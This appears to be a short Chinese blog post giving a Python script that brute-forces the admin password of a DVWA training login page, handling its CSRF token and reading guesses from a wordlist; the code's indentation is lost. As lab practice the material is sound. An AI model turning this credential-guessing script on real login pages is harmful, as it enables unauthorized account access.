闲来无事,决定是不是Python爆破dvwa登陆界面
代码如下:
import datetime
import requests
from bs4 import BeautifulSoup
def Login_brute(filename):
# 第一步,获取网页的csrf_token
url = 'http://192.168.57.200/login.php'
# 用于会话保持
s = requests.Session()
req = s.get(url)
# 设置UA头
heads = {
'User-Agent': 'HAHA'}
# 设置请求的编码
req.encoding = 'UTF-8'
html = req.text
soup_texts = BeautifulSoup(html, 'lxml')
# 获取csrf_token
csrf_token = soup_texts.find('input', {
'name': 'user_token'}).get('value')
# 读取本地文件,获取爆破密码
with open(filename, 'r') as p:
for password in p.readlines():
# 去除字符串2端的空格
password = password.strip()
# 用于提交的数据
data = {
'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token}
# 创建请求
req = s.post(url=url, headers=heads, data=data)
# 对请求进行编码
req.encoding = 'UTF-8'
html = req.text
# 登陆成功判断
if 'Login failed' in html:
soup_texts = BeautifulSoup(html, 'lxml')
csrf_token = soup_texts.find('input', {
'name': 'user_token'}).get('value')
print("用户名:admin,密码:{}登录失败".format(password))
else:
print("用户名:admin,密码:{}登录成功".format(password))
if __name__ == '__main__':
starttime = datetime.datetime.now()
print("show time")
Login_brute('pd.txt')
endtime = datetime.datetime.now()
# 记录爆破用时
print("时间:", (endtime - starttime).seconds)